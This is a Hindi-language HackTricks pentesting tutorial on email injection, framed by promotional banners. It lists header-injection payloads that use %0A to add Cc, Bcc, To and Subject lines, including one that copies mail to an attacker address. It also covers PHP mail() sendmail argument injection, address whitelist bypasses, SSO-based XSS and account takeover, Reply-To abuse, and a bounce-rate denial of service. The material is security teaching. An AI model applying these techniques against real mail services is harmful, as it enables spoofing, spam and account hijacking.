hacktricks/pentesting-web/email-injections.md

15 KiB

ईमेल इंजेक्शन्स


Trickest का उपयोग करके दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित वर्कफ्लोज़ को आसानी से बनाएं और स्वचालित करें
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें!

HackTricks का समर्थन करने के अन्य तरीके:

भेजे गए ईमेल में इंजेक्ट करें

प्रेषक तर्क के बाद Cc और Bcc इंजेक्ट करें

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

संदेश प्राप्तकर्ता और प्राप्तकर्ता1 खातों को भेजा जाएगा।

Inject तर्क

From:sender@domain.com%0ATo:attacker@domain.com

संदेश मूल प्राप्तकर्ता और हमलावर खाते को भेजा जाएगा।

Inject Subject तर्क

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

संदेश के शरीर में परिवर्तन करें

दो पंक्ति फीड इंजेक्ट करें, फिर अपना संदेश लिखें ताकि संदेश के शरीर में परिवर्तन किया जा सके।

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

PHP mail() फंक्शन का शोषण

# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

5वां पैरामीटर ($additional_parameters)

यह खंड इस पैरामीटर का दुरुपयोग करने पर आधारित होगा यदि एक हमलावर इसे नियंत्रित करता है

यह पैरामीटर PHP द्वारा sendmail बाइनरी को आह्वान करने के लिए उपयोग की जाने वाली कमांड लाइन में जोड़ा जाएगा। हालांकि, इसे escapeshellcmd($additional_parameters) फंक्शन के साथ सैनिटाइज किया जाएगा।

एक हमलावर इस मामले में sendmail के लिए अतिरिक्त पैरामीटर्स इंजेक्ट कर सकता है

/usr/sbin/sendmail के कार्यान्वयन में अंतर

sendmail इंटरफेस MTA ईमेल सॉफ्टवेयर (Sendmail, Postfix, Exim आदि) द्वारा प्रदान किया जाता है जो सिस्टम पर स्थापित होता है। हालांकि, मूल कार्यक्षमता (जैसे कि -t -i -f पैरामीटर्स) संगतता कारणों से समान रहती है, अन्य फंक्शन्स और पैरामीटर्स MTA पर निर्भर करते हुए काफी भिन्न होते हैं।

यहां sendmail कमांड/इंटरफेस के विभिन्न मैन पेजेस के कुछ उदाहरण दिए गए हैं:

sendmail बाइनरी के मूल के आधार पर विभिन्न विकल्पों की खोज की गई है जिनका दुरुपयोग करके फाइलें लीक की जा सकती हैं या यहां तक कि मनमाने कमांड्स भी निष्पादित किए जा सकते हैं। जांचें कैसे https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html में

ईमेल नाम में इंजेक्ट करें

ईमेल के अनदेखे हिस्से

प्रतीक: +, - और {} दुर्लभ अवसरों पर टैगिंग के लिए उपयोग किए जा सकते हैं और अधिकांश ई-मेल सर्वरों द्वारा अनदेखा किए जाते हैं

कोष्ठकों () के बीच टिप्पणियां शुरुआत या अंत में भी अनदेखी की जाएंगी

व्हाइटलिस्ट बायपास

उद्धरण

IPs

आप वर्गाकार कोष्ठकों के बीच डोमेन नाम के रूप में IPs का भी उपयोग कर सकते हैं:

  • john.doe@[127.0.0.1]
  • john.doe@[IPv6:2001:db8::1]

अन्य वल्न्स

तृतीय पक्ष SSO

XSS

कुछ सेवाएं जैसे कि github या salesforce आपको इसमें XSS पेलोड्स के साथ एक ईमेल पता बनाने की अनुमति देती हैं। यदि आप इन प्रदाताओं का उपयोग करके अन्य सेवाओं में लॉगिन कर सकते हैं और ये सेवाएं ईमेल को सही ढंग से सैनिटाइज नहीं कर रही हैं, तो आप XSS का कारण बन सकते हैं।

खाता-अधिग्रहण

यदि कोई SSO सेवा आपको दिए गए ईमेल पते की पुष्टि किए बिना एक खाता बनाने की अनुमति देती है (जैसे कि salesforce) और फिर आप उस खाते का उपयोग करके एक अलग सेवा में लॉगिन कर सकते हैं जो salesforce पर विश्वास करती है, तो आप किसी भी खाते तक पहुंच सकते हैं।
नोट करें कि salesforce यह संकेत देता है कि दिया गया ईमेल पुष्टि किया गया था या नहीं लेकिन इसलिए एप्लिकेशन को इस जानकारी को ध्यान में रखना चाहिए।

रिप्लाई-टू

आप From: company.com का उपयोग करके एक ईमेल भेज सकते हैं और Replay-To: attacker.com और यदि कोई स्वचालित उत्तर भेजा जाता है क्योंकि ईमेल आंतरिक पते से भेजा गया था तो हमलावर उस प्रतिक्रिया को प्राप्त कर सकता है।

हार्ड बाउंस रेट

कुछ एप्लिकेशन जैसे कि AWS में एक हार्ड बाउंस रेट होता है (AWS में यह 10% है), जब भी यह अधिक होता है तो ईमेल सेवा अवरुद्ध हो जाती है।

एक हार्ड बाउंस एक ईमेल होता है जिसे कुछ स्थायी कारणों से वितरित नहीं किया जा सका। शायद ईमेल का पता नकली है, शायद ईमेल डोमेन एक वास्तविक डोमेन नहीं है, या शायद ईमेल प्राप्तकर्ता का सर्वर ईमेल स्वीकार नहीं करेगा), इसका मतलब है कि कुल 1000 ईमेलों में से अगर 100 नकली थे या अमान्य थे जिससे सभी बाउंस हो गए, AWS SES आपकी सेवा को अवरुद्ध कर देगा।

इसलिए, यदि आप वेब एप्लिकेशन से किसी भी ईमेल पते पर मेल भेजने में सक्षम हैं (शायद निमंत्रण), तो आप गैर-मौजूद उपयोगकर्ताओं और डोमेनों को सैकड़ों निमंत्रण भेजकर इस अवरोध को उत्पन्न कर सकते हैं: ईमेल सेवा DoS।

संदर्भ

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:


Trickest का उपयोग करके आसानी से वर्कफ्लोज़ को बिल्ड और ऑटोमेट करें जो दुनिया के सबसे उन्नत समुदाय टूल्स द्वारा संचालित होते हैं।
आज ही एक्सेस प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source